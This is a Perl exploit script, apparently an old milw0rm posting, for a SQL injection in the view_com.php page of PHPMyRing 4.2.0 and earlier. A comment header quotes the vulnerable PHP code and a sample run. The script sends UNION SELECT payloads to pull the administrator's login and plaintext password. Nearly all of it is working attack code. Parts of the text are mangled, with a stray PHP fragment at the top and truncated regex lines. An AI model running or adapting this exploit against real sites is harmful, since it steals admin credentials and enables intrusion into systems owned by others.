<? echo _("Commentaires du site"). " ".$site

# Title: PHPMyRing's (view_com.php) Remote SQL injection Exploit # # Vendor: phpmyring # # webiste : http://phpmyring.sourceforge.net/ # # Version : <= 4.2.0 # # Severity: Critical # # Discovered by: Simo64 # # Exploit writting by: Simo Ben youssef # # Discovered: 09 Aout 2006 # # Published : 10 Aout 2006 # # MorX Security Research Team # # http://www.morx.org # # Details: # # vulnerable code on view_com.php line ( 14 - 24) # # [code] # ----------------------------------------------------------------------------------- # if (!$idsite) # { # echo "

"._("Erreur! Le n° du site n'est pas défini!")."

"; # } # else # { # // On va aller chercher le nom du site consern., .a sera fait ;) # // Connexion MySQL # $conn=connecte(); # $row=mysql_fetch_array(requete("SELECT site_nom FROM webring WHERE idsite=$idsite")); # <== SQL injection # $site_nom=$row['site_nom']; # # ............... # # # "> # # <? echo _("Commentaires du site"). " ".$site_nom; ?> # ---------------------------------------------------------------------------------[/code] # # $idsite is not properly sanitized and can be used to inject sql query # # Exploit to extract both admin login and plain text password: # # C:\>perl ring.pl 127.0.0.1 webring # ################################################# # # PHPMyRing's Remote SQL injection Exploit # # # Discovered by simo64_at_morx_org # # # Script writting by simo_at_morx_org # # # MorX Security Research Team # # # www.morx.org # # ################################################# # [*] Trying to get the admin login ... # [+] your admin login is --> admin # [+] your admin pass is --> 123456 use IO::Socket; if(!defined($ARGV[0] && $ARGV[1])) { system (clear); print "\n"; print "#################################################\n"; print "# PHPMyRing's Remote SQL injection Exploit #\n"; print "# Discovered by simo64_at_morx_org #\n"; print "# Script writting by simo_at_morx_org #\n"; print "# MorX Security Research Team #\n"; print "# www.morx.org #\n"; print "#################################################\n\n"; print "--- Usage: perl $0 \n"; print "--- Example: perl $0 127.0.0.1 afd_webring\n\n"; exit; } $TARGET = $ARGV[0]; $FOLDER = $ARGV[1]; $PORT = "80"; $SCRIPT = "/view_com.php?idsite="; $SQLPASS = "-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm"; $SQLADMIN = "-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm"; ################################################################################ $COMMAND1 = "GET /$FOLDER$SCRIPT$SQLADMIN HTTP/1.1"; $COMMAND2 = "Host: $TARGET"; $COMMAND3 = "Connection: Close"; $COMMAND4 = "GET /$FOLDER$SCRIPT$SQLPASS HTTP/1.1"; $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT") || die "Can't connect to $TARGET"; print "#################################################\n"; print "# PHPMyRing's Remote SQL injection Exploit #\n"; print "# Discovered by simo64_at_morx_org #\n"; print "# Script writting by simo_at_morx_org #\n"; print "# MorX Security Research Team #\n"; print "# www.morx.org #\n"; print "#################################################\n\n"; sleep 2; print "[*] Trying to get the admin login ...\n\n"; print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n"; while ($result = <$remote> ) { if ($result =~ /site (.*?) $adminlogin\n\n"; $a = 1; } } if ($a == 0) { print "[-] Failed, cant get the admin login\n\n"; print "[*] Trying to get the admin password ...\n\n"; } $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT") || die "Can't connect to $TARGET"; print $remote "$COMMAND4\n$COMMAND2\n$COMMAND3\n\n"; while ($result2 = <$remote> ) { if ($result2 =~ /site (.*?) $adminpass\n\n"; $b = 1; } } if ($b == 0) { print "[-] Failed, cant get the admin password\n"; } $remote->flush(); close($remote); exit; # milw0rm.com [2006-08-09]